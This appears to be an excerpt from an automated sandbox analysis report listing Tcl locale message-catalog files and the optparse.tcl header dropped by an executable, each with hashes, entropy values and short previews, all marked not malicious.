                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                              MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                              SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                              SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                              SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                              MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                              SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                              SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                              SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                              Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                              MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                              SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                              SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                              SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2359
                                                                                                                                                                                                                              Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                              MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                              SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                              SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                              SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1183
                                                                                                                                                                                                                              Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                              MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                              SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                              SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                              SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2165
                                                                                                                                                                                                                              Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                              MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                              SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                              SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                              SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1471
                                                                                                                                                                                                                              Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                              MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                              SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                              SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                              SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3385
                                                                                                                                                                                                                              Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                              MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                              SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                              SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                              SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):319
                                                                                                                                                                                                                              Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                              MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                              SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                              SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                              SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                              MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                              SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                              SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                              SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                                              Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                              MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                              SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                              SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                              SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):354
                                                                                                                                                                                                                              Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                              MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                              SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                              SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                              SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33777
                                                                                                                                                                                                                              Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                              MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                              SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                              SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                              SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):620
                                                                                                                                                                                                                              Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                              MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                              SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                              SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                              SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
